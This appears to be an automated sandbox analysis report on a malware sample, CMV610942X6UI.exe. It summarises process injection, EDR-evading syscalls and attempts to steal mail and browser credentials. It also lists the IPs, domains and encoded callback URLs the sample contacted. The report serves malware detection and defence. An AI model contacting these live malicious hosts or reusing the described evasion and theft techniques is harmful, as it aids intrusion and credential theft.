  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467082 Sample: CMV610942X6UI.exe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 31 www.tapnly.online 2->31 33 www.marinestoreng.com 2->33 35 8 other IPs or domains 2->35 45 Malicious sample detected (through community Yara rule) 2->45 47 Antivirus detection for URL or domain 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 6 other signatures 2->51 10 CMV610942X6UI.exe 3 2->10         started        signatures3 process4 file5 29 C:\Users\user\...\CMV610942X6UI.exe.log, ASCII 10->29 dropped 63 Injects a PE file into a foreign processes 10->63 14 CMV610942X6UI.exe 10->14         started        signatures6 process7 signatures8 65 Maps a DLL or memory area into another process 14->65 17 ZkqZZBQxQqm.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 systray.exe 13 17->20         started        process11 signatures12 53 Tries to steal Mail credentials (via file / registry access) 20->53 55 Tries to harvest and steal browser information (history, passwords, etc) 20->55 57 Modifies the context of a thread in another process (thread injection) 20->57 59 3 other signatures 20->59 23 ZkqZZBQxQqm.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.zethcraft.info 203.161.62.199, 49723, 49724, 49725 VNPT-AS-VNVNPTCorpVN Malaysia 23->37 39 www.kwytruband.cloud 124.156.180.97, 49743, 49744, 49745 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN Singapore 23->39 41 6 other IPs or domains 23->41 61 Found direct / indirect Syscall (likely to bypass EDR) 23->61 signatures15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
38.207.228.45
 www.thirstythursdaywines.com United States
9009 M247GB false
124.156.180.97
 www.kwytruband.cloud Singapore
132203 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN false
199.59.243.226
 www.mommysdaycare.net United States
395082 BODIS-NJUS false
203.161.62.199
 www.zethcraft.info Malaysia
45899 VNPT-AS-VNVNPTCorpVN false
64.190.62.22
 www.tutoringservices-jp.space United States
11696 NBS11696US false
104.21.10.169
 www.aotuqiye.com United States
13335 CLOUDFLARENETUS false
131.153.148.82
 marinestoreng.com United States
19437 SS-ASHUS false
35.214.213.30
 www.herplaatsingscoach.com United States
19527 GOOGLE-2US false

Contacted Domains

Name IP Active
www.mommysdaycare.net 199.59.243.226 true
marinestoreng.com 131.153.148.82 true
www.tutoringservices-jp.space 64.190.62.22 true
www.kwytruband.cloud 124.156.180.97 true
www.thirstythursdaywines.com 38.207.228.45 true
www.zethcraft.info 203.161.62.199 true
www.aotuqiye.com 104.21.10.169 true
www.herplaatsingscoach.com 35.214.213.30 true
www.tapnly.online unknown unknown
www.marinestoreng.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.kwytruband.cloud/siy1/?Efup=K3jVd2QwvP/vE5bLqRwLiG/ouCi2dCf8HcrsXZX+iIcvtfjJNCMaZ4cNZ/78hy4DUFhEXV0DZOcTULe6zQ1rJbzjmaVovzYps5hxNWqkCnG6IikFfqhaq5tMJN6I5yDLJQ==&5X=Wrl4wnYP false
  • Avira URL Cloud: safe
 unknown
http://www.aotuqiye.com/kyls/ false
  • Avira URL Cloud: safe
 unknown
http://www.marinestoreng.com/w7zx/ false
  • Avira URL Cloud: safe
 unknown
http://www.kwytruband.cloud/siy1/ false
  • Avira URL Cloud: safe
 unknown
http://www.tutoringservices-jp.space/7kq8/ false
  • Avira URL Cloud: phishing
 unknown
http://www.zethcraft.info/d5d3/?Efup=XQbeRjD/PDdWBh12NU+ykUl2F4dvHc6VXEhqzGSjB3wJSjcs0xwI8Icac1G5+8QpiM7OSYRY7+DwwJfqawKXGWKHnDunR+LM5fl2Yw480JpoJUWygYqvECbW/AkZxLcv1w==&5X=Wrl4wnYP false
  • Avira URL Cloud: safe
 unknown
http://www.thirstythursdaywines.com/bakr/?Efup=XDoTgsrtu8W4rBGfVFPBe+VTMhp4aj1fDDoEglHaJ5OOwDCoRETt6EMOwV71ZOd09KZu8+ugWGfmhcxQhERPkTRicN45Uigraquu8zuJ3nqxw5c62M4XByCrclFahX0wxg==&5X=Wrl4wnYP false
  • Avira URL Cloud: safe
 unknown
http://www.aotuqiye.com/kyls/?Efup=rBqEkS5/F5fti2d01GsRL+09s9Yw9GfL+xb/bd6jjd9iqmgZJUglXlxIaQ37OHsjGQRRYNPuqH7W49E+lFfrzONNxRCWpYpdl2nohzXrMm+ut6S054Q8wZKBKIXyn1qR4w==&5X=Wrl4wnYP false
  • Avira URL Cloud: safe
 unknown
http://www.zethcraft.info/d5d3/ false
  • Avira URL Cloud: safe
 unknown
http://www.mommysdaycare.net/9tym/?Efup=0S/ZPq6i4295YU31CGsIF3+6CX49wr8UBlIPMbX3EHvT6GYfIlkKvIaQUZZ23gNfBRY92LbOf61zdN1D+KaxZKPZCNQTzZg2JqvKwBvhTNR6FU45NnpKZwAnu57SnFRcaQ==&5X=Wrl4wnYP false
  • Avira URL Cloud: safe
 unknown
http://www.marinestoreng.com/w7zx/?Efup=4nFzxviigBNCR0XnJkvhNhUb0o3qDKAKJVt5c0EBpnWfgFZ7hCzAhg6W/oCSYblqABe344EIzDMItVaOjGR7QKZXmGlK5CURSd3zTznCfgDClaltbyP35QucHh8Re5qnMA==&5X=Wrl4wnYP false
  • Avira URL Cloud: safe
 unknown
http://www.herplaatsingscoach.com/wwqg/?Efup=cPWBLmqfYdwFLm3BEseWSNTw863lhs9YSZmOJUbUOjzc/4eC4u1GiXOWq2hFnbSrpYq5tfQM8qwnGlhpBH7wUMA2rqYfQo8R+3WIcA6o0TPRBDA7dTlRc+xV9X/9AN+Ulg==&5X=Wrl4wnYP false
  • Avira URL Cloud: safe
 unknown
http://www.herplaatsingscoach.com/wwqg/ false
  • Avira URL Cloud: safe
 unknown
http://www.tutoringservices-jp.space/7kq8/?Efup=gtM5/A+y2ZoJWEDfDaE+2w6kJ8M6pgUfoEVlPe5CjlMa7apflPEeb4hE3FwUuugxFTbEVrAuO+b6prDKuBbSe95OhQpk0L9IAVb1ZHk0JEw5+OIIQunEo+vX5ya5UUiI4w==&5X=Wrl4wnYP false
  • Avira URL Cloud: phishing
 unknown
http://www.mommysdaycare.net/9tym/ false
  • Avira URL Cloud: safe
 unknown